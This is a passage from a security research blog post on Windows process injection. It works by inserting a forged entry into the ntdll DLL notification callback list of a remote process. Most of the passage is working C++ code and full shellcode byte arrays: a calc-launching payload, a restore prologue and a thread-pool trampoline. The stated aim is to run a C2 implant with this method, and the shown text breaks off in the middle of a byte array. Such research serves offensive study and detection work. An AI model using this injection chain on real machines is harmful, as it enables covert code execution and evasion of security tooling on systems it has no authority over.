0x0, 0x0, 0x48, 0x8d, 0x8d, 0x1, 0x1, 0x0, 0x0, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0xa, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x6, 0x7c, 0xa, 0x80, 0xfb, 0xe0, 0x75, 0x5, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x0, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x0 };

int main()
{
    // Get local LdrpDllNotificationList head address
    LPVOID localHeadAddress = (LPVOID)GetDllNotificationListHead();
    printf("[+] Local LdrpDllNotificationList head address: 0x%p\n", localHeadAddress);

    // Get local NTDLL base address
    HANDLE hNtdll = GetModuleHandleA("NTDLL.dll");
    printf("[+] Local NTDLL base address: 0x%p\n", hNtdll);

    // Calculate the offset of LdrpDllNotificationList from NTDLL base
    int offsetFromBase = (BYTE*)localHeadAddress - (BYTE*)hNtdll;
    printf("[+] LdrpDllNotificationList offset from NTDLL base: 0x%X\n", offsetFromBase);

    // Open handle to remote process
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 9656);
    printf("[+] Got handle to remote process\n");

    // Get remote NTDLL base address
    LPVOID remoteNtdllBase = GetNtdllBase(hProc);
    LPVOID remoteHeadAddress = (BYTE*)remoteNtdllBase + offsetFromBase;
    printf("[+] Remote LdrpDllNotificationList head address 0x%p\n", remoteHeadAddress);

    // Print the remote Dll Notification List
    PrintDllNotificationList(hProc, remoteHeadAddress);

    // Allocate memory for our shellcode in the remote process
    LPVOID shellcodeEx = VirtualAllocEx(hProc, 0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    printf("[+] Allocated memory for shellcode in remote process: 0x%p\n", shellcodeEx);

    // Write the shellcode to the remote process
    WriteProcessMemory(hProc, shellcodeEx, shellcode, sizeof(shellcode), nullptr);
    printf("[+] Shellcode has been written to remote process: 0x%p\n", shellcodeEx);

    // Create a new LDR_DLL_NOTIFICATION_ENTRY
    LDR_DLL_NOTIFICATION_ENTRY newEntry = {};
    newEntry.Context = NULL;
    
    // Set the Callback attribute to point to our shellcode
    newEntry.Callback = (PLDR_DLL_NOTIFICATION_FUNCTION)shellcodeEx;
    
    // We want our new entry to be the first in the list 
    // so its List.Blink attribute should point to the head of the list
    newEntry.List.Blink = (PLIST_ENTRY)remoteHeadAddress;

    // Allocate memory buffer for LDR_DLL_NOTIFICATION_ENTRY
    BYTE* remoteHeadEntry = (BYTE*)malloc(sizeof(LDR_DLL_NOTIFICATION_ENTRY));

    // Read the head entry from the remote process
    ReadProcessMemory(hProc, remoteHeadAddress, remoteHeadEntry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);

    // Set the new entry's List.Flink attribute to point to the original first entry in the list
    newEntry.List.Flink = ((PLDR_DLL_NOTIFICATION_ENTRY)remoteHeadEntry)->List.Flink;

    // Allocate memory for our new entry
    LPVOID newEntryAddress = VirtualAllocEx(hProc, 0, sizeof(LDR_DLL_NOTIFICATION_ENTRY), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("[+] Allocated memory for new entry in remote process: 0x%p\n", newEntryAddress);
    
    // Write our new entry to the remote process
    WriteProcessMemory(hProc, (BYTE*)newEntryAddress, &newEntry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);
    printf("[+] New entry has been written to remote process: 0x%p\n", newEntryAddress);

    // Calculate the addresses we need to overwrite with our new entry's address
    // The previous entry's Flink (head) and the next entry's Blink (original 1st entry)
    LPVOID previousEntryFlink = (LPVOID)((BYTE*)remoteHeadAddress + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Flink));
    LPVOID nextEntryBlink = (LPVOID)((BYTE*)((PLDR_DLL_NOTIFICATION_ENTRY)remoteHeadEntry)->List.Flink + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Blink));

    // Overwrite the previous entry's Flink (head) with our new entry's address
    WriteProcessMemory(hProc, previousEntryFlink, &newEntryAddress, 8, nullptr);

    // Overwrite the next entry's Blink (original 1st entry) with our new entry's address
    WriteProcessMemory(hProc, nextEntryBlink, &newEntryAddress, 8, nullptr);

    printf("[+] LdrpDllNotificationList has been modified.\n");
    printf("[+] Our new entry has been inserted.\n");

    // Print the remote Dll Notification List
    PrintDllNotificationList(hProc, remoteHeadAddress);

}

Here are the results. On the right we can see our old code where we registered our DLL Notification Callback (MyCallback) and then loaded a new DLL using LoadLibrary to trigger the callback. I modified the code with getchar() right before the LoadLibrary trigger so I have the chance to execute the code above which you can see on the left. This code injects our newly created LDR_DLL_NOTIFICATION_ENTRY into the remote process. I then triggered the LoadLibrary and our shellcode got executed as expected. It works!
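
The four pointer updates behind this insertion are easier to follow on a purely local list. The following is a minimal sketch, assuming a hypothetical ListEntry struct that only mirrors the Flink/Blink layout of LIST_ENTRY. It runs entirely in the current process and is not the code used above:

```cpp
#include <cassert>
#include <cstddef>

// Hypothetical stand-in for the LIST_ENTRY layout (Flink first, then Blink).
struct ListEntry {
    ListEntry* Flink; // next entry
    ListEntry* Blink; // previous entry
};

// An empty circular list: the head points at itself in both directions.
inline void initHead(ListEntry* head) {
    head->Flink = head;
    head->Blink = head;
}

// Insert `node` right after `head`, so it becomes the first entry.
inline void insertFirst(ListEntry* head, ListEntry* node) {
    ListEntry* oldFirst = head->Flink; // original first entry (head itself if empty)
    node->Blink = head;                // 1. new entry points back at the head
    node->Flink = oldFirst;            // 2. new entry points forward at the old first entry
    head->Flink = node;                // 3. head points forward at the new entry
    oldFirst->Blink = node;            // 4. old first entry points back at the new entry
}

// Count entries by following Flink until we are back at the head.
inline std::size_t countEntries(const ListEntry* head) {
    std::size_t n = 0;
    for (const ListEntry* e = head->Flink; e != head; e = e->Flink) ++n;
    return n;
}
```

Steps 1 and 2 correspond to filling in newEntry.List before writing it, and steps 3 and 4 correspond to the two 8-byte writes that patch the head's Flink and the original first entry's Blink.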

We're Not Done Yet

For the final POC (this time, proof of concept 😜), I wanted to execute a C2 implant shellcode instead of popping calc, but whenever the shellcode was triggered the process crashed. I created a basic loader to debug the shellcode and find out why the calc shellcode works but the C2 shellcode doesn't.

I ran the shellcode loader with API Monitor attached, and the cause became clear: the C2 shellcode loads other DLLs itself. Each of those loads fires the DLL notification callbacks again, which runs our shellcode again, which loads more DLLs, and so on. Do you see the issue here? A callback shellcode that loads another DLL sends the thread into a loop that eventually crashes the thread or the whole process.
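
To make the loop concrete, here is a toy simulation. It is only a sketch: ToyLoader, its depth counters, and the artificial limit are all hypothetical and do not model how ntdll is actually implemented. It only shows how a callback that triggers another load keeps nesting until something gives:

```cpp
#include <cassert>
#include <functional>
#include <vector>

// Toy model of a loader that notifies every registered callback on each load.
struct ToyLoader {
    std::vector<std::function<void(ToyLoader&)>> callbacks;
    int depth = 0;    // current nesting of load() calls
    int maxDepth = 0; // deepest nesting seen so far
    int limit = 0;    // artificial cap so the demo terminates

    void load() {
        if (depth >= limit) return; // a real process has no such cap
        ++depth;
        if (depth > maxDepth) maxDepth = depth;
        for (auto& cb : callbacks) cb(*this); // "DLL loaded" notification
        --depth;
    }
};

// Returns the deepest nesting reached for a single registered callback.
inline int simulateCallback(bool callbackLoadsModule, int limit) {
    ToyLoader loader;
    loader.limit = limit;
    loader.callbacks.push_back([callbackLoadsModule](ToyLoader& l) {
        if (callbackLoadsModule) l.load(); // the callback itself "loads a DLL"
    });
    loader.load();
    return loader.maxDepth;
}
```

With a callback that does not load anything, simulateCallback(false, 50) nests only once. With a callback that loads a module, simulateCallback(true, 50) nests until it hits the artificial limit, which stands in for the point where a real thread would run out of stack.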

Looking at MSDN we can even see the warning for this issue:

https://learn.microsoft.com/en-us/windows/win32/devnotes/ldrdllnotification

To mitigate this, I decided to create a mini shellcode, a kind of prologue. It is placed right before our malicious shellcode and gets executed first. The prologue restores the original values of the LdrpDllNotificationList head's List.Flink attribute and of the original first entry's (now second entry's) List.Blink attribute, which removes our malicious callback entry from the DLL Notification Callback List. Here is the code for this concept:

C++
// Pop Calc.exe Shellcode from Sektor7
unsigned char shellcode[276] = { 0xfc, 0x48, ... };

unsigned char restore[] = {
    0x41, 0x56,														// push r14
    0x49, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,		// mov r14, 0x1122334455667788
    0x41, 0xC7, 0x06, 0x44, 0x33, 0x22, 0x11,						// mov dword [r14], 0x11223344
    0x41, 0xC7, 0x46, 0x04, 0x44, 0x33, 0x22, 0x11, 				// mov dword [r14+4], 0x11223344
    0x49, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,		// mov r14, 0x1122334455667788
    0x41, 0xC7, 0x06, 0x44, 0x33, 0x22, 0x11,						// mov dword [r14], 0x11223344
    0x41, 0xC7, 0x46, 0x04, 0x44, 0x33, 0x22, 0x11, 				// mov dword [r14+4], 0x11223344
    0x41, 0x5e,														// pop r14
};

int main()
{
    // <snipped for brevity>

    // Allocate memory for our restore prologue + shellcode in the remote process
    LPVOID restoreEx = VirtualAllocEx(hProc, 0, sizeof(restore) + sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    printf("[+] Allocated memory for restore prologue + shellcode in remote process\n");
    printf("[+] Restore prologue address in remote process: 0x%p\n", restoreEx);

    // Offset the size of the restore prologue to get the shellcode address
    LPVOID shellcodeEx = (BYTE*)restoreEx + sizeof(restore);
    printf("[+] Shellcode address in remote process: 0x%p\n", shellcodeEx);

    // Write the shellcode to the remote process
    WriteProcessMemory(hProc, shellcodeEx, shellcode, sizeof(shellcode), nullptr);
    printf("[+] Shellcode has been written to remote process: 0x%p\n", shellcodeEx);

    // <snipped for brevity>
    
    // Set the Callback attribute to point to our restore prologue
    newEntry.Callback = (PLDR_DLL_NOTIFICATION_FUNCTION)restoreEx;
    
    // <snipped for brevity>

    // Calculate the addresses we need to overwrite with our new entry's address
    // The previous entry's Flink (head) and the next entry's Blink (original 1st entry)
    LPVOID previousEntryFlink = (LPVOID)((BYTE*)remoteHeadAddress + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Flink));
    LPVOID nextEntryBlink = (LPVOID)((BYTE*)((PLDR_DLL_NOTIFICATION_ENTRY)remoteHeadEntry)->List.Flink + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Blink));

    // Buffer for the original values we are going to overwrite
    unsigned char originalValue[8] = {};

    // Read the original value of the previous entry's Flink (head)
    ReadProcessMemory(hProc, previousEntryFlink, &originalValue, 8, nullptr);
    memcpy(&restore[4], &previousEntryFlink, 8); // Set address to restore for previous entry's Flink (head)
    memcpy(&restore[15], &originalValue[0], 4); // Set the value to restore (1st half of value)
    memcpy(&restore[23], &originalValue[4], 4); // Set the value to restore (2nd half of value)

    // Read the original value of the next entry's Blink (original 1st entry)
    ReadProcessMemory(hProc, nextEntryBlink, &originalValue, 8, nullptr);
    memcpy(&restore[29], &nextEntryBlink, 8); // Set address to restore for next entry's Blink (original 1st entry)
    memcpy(&restore[40], &originalValue[0], 4); // Set the value to restore (1st half of value)
    memcpy(&restore[48], &originalValue[4], 4); // Set the value to restore (2nd half of value)

    // Write the restore prologue to the remote process
    WriteProcessMemory(hProc, restoreEx, restore, sizeof(restore), nullptr);
    printf("[+] Restore prologue has been written to remote process: 0x%p\n", restoreEx);

    // Overwrite the previous entry's Flink (head) with our new entry's address
    WriteProcessMemory(hProc, previousEntryFlink, &newEntryAddress, 8, nullptr);

    // Overwrite the next entry's Blink (original 1st entry) with our new entry's address
    WriteProcessMemory(hProc, nextEntryBlink, &newEntryAddress, 8, nullptr);

    printf("[+] LdrpDllNotificationList has been modified.\n");
    printf("[+] Our new entry has been inserted.\n");

    // <snipped for brevity>

}
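
A side note on the memcpy offsets used for the restore prologue. x64 has no instruction that stores a 64-bit immediate directly to memory, which is why the prologue writes each pointer as two 32-bit halves and why each original value is patched in two pieces. The sketch below shows that split on a plain local buffer. The helper names patchSplit64 and readSplit64 are hypothetical and exist only for this illustration:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Copy a 64-bit value into `buf` as two 32-bit halves at separate offsets.
// The halves are taken in memory order, so on little-endian x64 the low
// half is written at loOffset and the high half at hiOffset.
inline void patchSplit64(unsigned char* buf, std::size_t loOffset,
                         std::size_t hiOffset, std::uint64_t value) {
    unsigned char bytes[8];
    std::memcpy(bytes, &value, sizeof(bytes)); // raw in-memory representation
    std::memcpy(buf + loOffset, &bytes[0], 4); // first 4 bytes in memory
    std::memcpy(buf + hiOffset, &bytes[4], 4); // last 4 bytes in memory
}

// Reassemble the value from the two halves (the inverse of patchSplit64).
inline std::uint64_t readSplit64(const unsigned char* buf, std::size_t loOffset,
                                 std::size_t hiOffset) {
    unsigned char bytes[8];
    std::memcpy(&bytes[0], buf + loOffset, 4);
    std::memcpy(&bytes[4], buf + hiOffset, 4);
    std::uint64_t value = 0;
    std::memcpy(&value, bytes, sizeof(value));
    return value;
}
```

In the restore array, the two 32-bit immediates of the first pair of mov dword instructions start at byte offsets 15 and 23, and those of the second pair at 40 and 48, which matches the offsets passed to memcpy in the listing.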

Unfortunately, the restore prologue didn't work as expected: for some reason, our newly created entry didn't get removed. After some trial and error, I noticed that I can remove the entry from another process (remotely) or from another thread in the same process, but not from the thread that is executing the callback. In other words, the callback can't remove its own entry from within itself.

I came up with a cool solution: a trampoline shellcode that uses a Thread Pool Work Callback to offload the execution of the restore prologue and our malicious shellcode to another thread. This approach has the added benefit of improving the stability of the remote process, since we are not hijacking any of its main threads. Well, we actually do, with the trampoline shellcode, but only for a very short time before we give control back to the original thread.

I chose to use @C5pider's ShellcodeTemplate project to create the trampoline shellcode. We can, of course, create the trampoline shellcode from scratch, but I figured it was a good opportunity to give @C5pider a shoutout for this cool project and also introduce the topic of shellcoding (as if this blog post isn't packed already...)

Do You Have This In Shellcode?

A quick (and very basic) primer on shellcode: shellcode is position-independent code, meaning it can run from anywhere in memory. It can do so because it is written in a way that doesn't depend on being loaded at a fixed address or on an import table: any offsets it uses are relative to its own location in memory. If it does need external functions, it locates them in memory by itself at runtime, without help from the loader.
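
The Entry.c listing further down looks functions up by hash values instead of by name. As a rough illustration of that idea only, here is a sketch that resolves a function from a small local table by the hash of its name. Everything in it is an assumption made for the example: the djb2-style hashName function is not necessarily the hash that ShellcodeTemplate uses, and kTable is just a stand-in for a real export table:

```cpp
#include <cassert>
#include <cstdint>

// djb2-style string hash (illustrative choice, see the note above).
inline std::uint32_t hashName(const char* s) {
    std::uint32_t h = 5381;
    while (*s) {
        h = h * 33u + static_cast<unsigned char>(*s);
        ++s;
    }
    return h;
}

using Fn = int (*)(int);
struct NamedFn { const char* name; Fn fn; };

static int addOne(int x) { return x + 1; }
static int twice(int x) { return x * 2; }

// Hypothetical stand-in for a module's export table.
static const NamedFn kTable[] = { {"AddOne", addOne}, {"Twice", twice} };

// Find a function by the hash of its name rather than by the name itself.
inline Fn findByHash(std::uint32_t wanted) {
    for (const NamedFn& e : kTable)
        if (hashName(e.name) == wanted) return e.fn;
    return nullptr; // no entry with that hash
}
```

The caller only needs to carry a 32-bit constant for each function it wants, which is why the shellcode source contains hard-coded numbers instead of function name strings.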

Back to our trampoline shellcode. We need our shellcode to use the TpAllocWork, TpPostWork and TpReleaseWork functions to create and run a TpWorkCallback which would execute our restore prologue and malicious shellcode in a different thread.

P.S: For more information on TpWorkCallbacks you can check out this blog post by @ninjaparanoid.

Working with @C5pider's ShellcodeTemplate project is pretty easy. After cloning the project, we simply edit the file Entry.c, which contains the code our shellcode executes:

ShellcodeTemplate\Source\Entry.c
#include <Core.h>
#include <Win32.h>

SEC( text, B ) VOID Entry( VOID ) 
{
    INSTANCE Instance = { };

    Instance.Modules.Kernel32   = LdrModulePeb( HASH_KERNEL32 ); 
    Instance.Modules.Ntdll      = LdrModulePeb( HASH_NTDLL ); 
    
    if ( Instance.Modules.Kernel32 != NULL )
    {
        // Hashes were calculated with Scripts/Hasher tool
        Instance.Win32.WaitForSingleObject = LdrFunction( Instance.Modules.Kernel32, 0xdf1b3da );
    }
    

    if ( Instance.Modules.Ntdll != NULL )
    {
        // Hashes were calculated with Scripts/Hasher tool
        Instance.Win32.TpAllocWork = LdrFunction( Instance.Modules.Ntdll, 0x3fc58c37 );
        Instance.Win32.TpPostWork = LdrFunction( Instance.Modules.Ntdll, 0x4d915ab2 );
        Instance.Win32.TpReleaseWork = LdrFunction( Instance.Modules.Ntdll, 0x27a9ff4d );
    }

    // ------ Code ------
    
    // The restore prologue address - this is a place holder to be changed during runtime
    PVOID restoreEx = 0x1111111111111111;

    // Creating our TpWorkCallback pointing it to our restore prologue address
    PTP_WORK WorkReturn = NULL;
    Instance.Win32.TpAllocWork( &WorkReturn, (PTP_WORK_CALLBACK)restoreEx, NULL, NULL );
    Instance.Win32.TpPostWork( WorkReturn );
    Instance.Win32.TpReleaseWork( WorkReturn );

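    // Wait up to 0x1000 ms (about 4 seconds) to let the TpWorkCallback finish.
    // (HANDLE)-1 is the current-process pseudo-handle, so this call simply times out.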
    Instance.Win32.WaitForSingleObject( (HANDLE)-1, 0x1000 );

} 

Notice that we've set our restore prologue address "restoreEx" to 0x1111111111111111. This is simply a placeholder, since we don't know in advance what the restore prologue address in the remote process will be. We will use the following FindPattern function to patch it at runtime.

C++
BOOL MaskCompare(const BYTE* pData, const BYTE* bMask, const char* szMask)
{
	for (; *szMask; ++szMask, ++pData, ++bMask)
		if (*szMask == 'x' && *pData != *bMask)
			return FALSE;
	return TRUE;
}

DWORD_PTR FindPattern(DWORD_PTR dwAddress, DWORD dwLen, PBYTE bMask, PCHAR szMask)
{
	for (DWORD i = 0; i < dwLen; i++)
		if (MaskCompare((PBYTE)(dwAddress + i), bMask, szMask))
			return (DWORD_PTR)(dwAddress + i);

	return 0;
}

unsigned char trampoline[] = { 0x3c, 0x79, ... };

int main() {
    // <snipped for brevity>
    
    // Find our restoreEx place holder in the trampoline shellcode
    LPVOID restoreExInTrampoline = (LPVOID)FindPattern((DWORD_PTR)&trampoline, sizeof(trampoline), (PBYTE)"\x11\x11\x11\x11\x11\x11\x11\x11", (PCHAR)"xxxxxxxx");

    // Overwrite our restoreEx place holder with the address of our restore prologue
    memcpy(restoreExInTrampoline, &restoreEx, 8);

    // Write the trampoline shellcode to the remote process
    WriteProcessMemory(hProc, trampolineEx, trampoline, sizeof(trampoline), nullptr);
    printf("[+] trampoline has been written to remote process: 0x%p\n", trampolineEx);

    // <snipped for brevity>
}
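
The same find-and-patch step can be tried out on a plain local buffer. This is a minimal sketch using std::search from the standard library instead of the mask-based FindPattern above. The helper names findBytes and patchPlaceholder are hypothetical, and nothing here touches another process:

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Return the offset of the first occurrence of `pat` in `buf`, or -1 if absent.
// std::search stays within [buf, buf + bufLen).
inline std::ptrdiff_t findBytes(const unsigned char* buf, std::size_t bufLen,
                                const unsigned char* pat, std::size_t patLen) {
    const unsigned char* end = buf + bufLen;
    const unsigned char* hit = std::search(buf, end, pat, pat + patLen);
    return hit == end ? -1 : hit - buf;
}

// Replace an 8-byte placeholder with `value`; returns false if it was not found.
inline bool patchPlaceholder(unsigned char* buf, std::size_t bufLen,
                             std::uint64_t placeholder, std::uint64_t value) {
    unsigned char pat[8];
    std::memcpy(pat, &placeholder, sizeof(pat));
    std::ptrdiff_t off = findBytes(buf, bufLen, pat, sizeof(pat));
    if (off < 0) return false;                      // nothing to patch
    std::memcpy(buf + off, &value, sizeof(value));  // overwrite in place
    return true;
}
```

Checking the return value matters here: if the placeholder is missing, for example because the compiler emitted the constant differently, the buffer is left untouched and the caller can stop instead of copying to an invalid address.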

We also need to edit the Core.h file and add our function definitions:

ShellcodeTemplate\Include\Core.h
#include <windows.h>
#include <Macros.h>

UINT_PTR GetRIP( VOID );

NTSTATUS NTAPI TpAllocWork(PTP_WORK* ptpWrk, PTP_WORK_CALLBACK pfnwkCallback, PVOID OptionalArg, PTP_CALLBACK_ENVIRON CallbackEnvironment);
VOID NTAPI TpPostWork(PTP_WORK);
VOID NTAPI TpReleaseWork(PTP_WORK);

typedef struct {

    struct {
        WIN32_FUNC( TpAllocWork );
        WIN32_FUNC( TpPostWork );
        WIN32_FUNC( TpReleaseWork );
        WIN32_FUNC( WaitForSingleObject );
    } Win32; 

    struct {
        // Basics
        HMODULE     Kernel32;
        HMODULE     Ntdll;
    } Modules;

} INSTANCE, *PINSTANCE;

Finally, after compiling the program and extracting the shellcode for our trampoline (simply use make x64 in the ShellcodeTemplate project), here is the final working code:

C++
// Pop Calc.exe Shellcode from Sektor7
unsigned char shellcode[276] = { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x0, 0x0, 0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0xf, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x1, 0xd0, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x1, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x41, 0x8b, 0xc, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x48, 0x8d, 0x8d, 0x1, 0x1, 0x0, 0x0, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0xa, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x6, 0x7c, 0xa, 0x80, 0xfb, 0xe0, 0x75, 0x5, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x0, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x0 };

unsigned char restore[] = {
    0x41, 0x56,														// push r14
    0x49, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,		// mov r14, 0x1122334455667788
    0x41, 0xC7, 0x06, 0x44, 0x33, 0x22, 0x11,						// mov dword [r14], 0x11223344
    0x41, 0xC7, 0x46, 0x04, 0x44, 0x33, 0x22, 0x11, 				// mov dword [r14+4], 0x11223344
    0x49, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,		// mov r14, 0x1122334455667788
    0x41, 0xC7, 0x06, 0x44, 0x33, 0x22, 0x11,						// mov dword [r14], 0x11223344
    0x41, 0xC7, 0x46, 0x04, 0x44, 0x33, 0x22, 0x11, 				// mov dword [r14+4], 0x11223344
    0x41, 0x5e,														// pop r14
};

// Trampoline shellcode that uses TpAllocWork to queue our restore prologue and malicious shellcode as a work item
// Created using https://github.com/Cracked5pider/ShellcodeTemplate
unsigned char trampoline[] = { 0x56, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x20, 0xe8, 0xf, 0x0, 0x0, 0x0, 0x48, 0x89, 0xf4, 0x5e, 0xc3, 0x66, 0x2e, 0xf, 0x1f, 0x84, 0x0, 0x0, 0x0, 0x0, 0x0, 0x41, 0x55, 0xb9, 0xf0, 0x1d, 0xd3, 0xad, 0x41, 0x54, 0x57, 0x56, 0x53, 0x31, 0xdb, 0x48, 0x83, 0xec, 0x30, 0xe8, 0xf9, 0x0, 0x0, 0x0, 0xb9, 0x53, 0x17, 0xe6, 0x70, 0x49, 0x89, 0xc5, 0xe8, 0xec, 0x0, 0x0, 0x0, 0x49, 0x89, 0xc4, 0x4d, 0x85, 0xed, 0x74, 0x10, 0xba, 0xda, 0xb3, 0xf1, 0xd, 0x4c, 0x89, 0xe9, 0xe8, 0x28, 0x1, 0x0, 0x0, 0x48, 0x89, 0xc3, 0x4d, 0x85, 0xe4, 0x74, 0x32, 0x4c, 0x89, 0xe1, 0xba, 0x37, 0x8c, 0xc5, 0x3f, 0xe8, 0x13, 0x1, 0x0, 0x0, 0x4c, 0x89, 0xe1, 0xba, 0xb2, 0x5a, 0x91, 0x4d, 0x48, 0x89, 0xc7, 0xe8, 0x3, 0x1, 0x0, 0x0, 0x4c, 0x89, 0xe1, 0xba, 0x4d, 0xff, 0xa9, 0x27, 0x48, 0x89, 0xc6, 0xe8, 0xf3, 0x0, 0x0, 0x0, 0x49, 0x89, 0xc4, 0xeb, 0x7, 0x45, 0x31, 0xe4, 0x31, 0xf6, 0x31, 0xff, 0x45, 0x31, 0xc9, 0x45, 0x31, 0xc0, 0x48, 0x8d, 0x4c, 0x24, 0x28, 0x48, 0xba, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x0, 0x0, 0x0, 0x0, 0xff, 0xd7, 0x48, 0x8b, 0x4c, 0x24, 0x28, 0xff, 0xd6, 0x48, 0x8b, 0x4c, 0x24, 0x28, 0x41, 0xff, 0xd4, 0xba, 0x0, 0x10, 0x0, 0x0, 0x48, 0x83, 0xc9, 0xff, 0xff, 0xd3, 0x48, 0x83, 0xc4, 0x30, 0x5b, 0x5e, 0x5f, 0x41, 0x5c, 0x41, 0x5d, 0xc3, 0x49, 0x89, 0xd1, 0x49, 0x89, 0xc8, 0xba, 0x5, 0x15, 0x0, 0x0, 0x8a, 0x1, 0x4d, 0x85, 0xc9, 0x75, 0x6, 0x84, 0xc0, 0x75, 0x16, 0xeb, 0x2f, 0x41, 0x89, 0xca, 0x45, 0x29, 0xc2, 0x4d, 0x39, 0xca, 0x73, 0x24, 0x84, 0xc0, 0x75, 0x5, 0x48, 0xff, 0xc1, 0xeb, 0x7, 0x3c, 0x60, 0x76, 0x3, 0x83, 0xe8, 0x20, 0x41, 0x89, 0xd2, 0xf, 0xb6, 0xc0, 0x48, 0xff, 0xc1, 0x41, 0xc1, 0xe2, 0x5, 0x44, 0x1, 0xd0, 0x1, 0xc2, 0xeb, 0xc4, 0x89, 0xd0, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x57, 0x56, 0x48, 0x89, 0xce, 0x53, 0x48, 0x83, 0xec, 0x20, 0x65, 0x48, 0x8b, 0x4, 0x25, 0x60, 0x0, 0x0, 0x0, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x20, 0x48, 0x89, 0xfb, 0xf, 0xb7, 0x53, 
